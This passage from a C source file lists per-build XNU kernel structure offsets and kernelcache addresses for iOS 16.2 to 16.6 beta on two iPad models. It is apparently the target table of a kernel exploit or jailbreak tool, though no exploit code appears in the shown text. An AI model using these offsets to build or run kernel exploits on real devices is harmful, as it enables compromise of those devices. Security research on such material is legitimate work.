._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 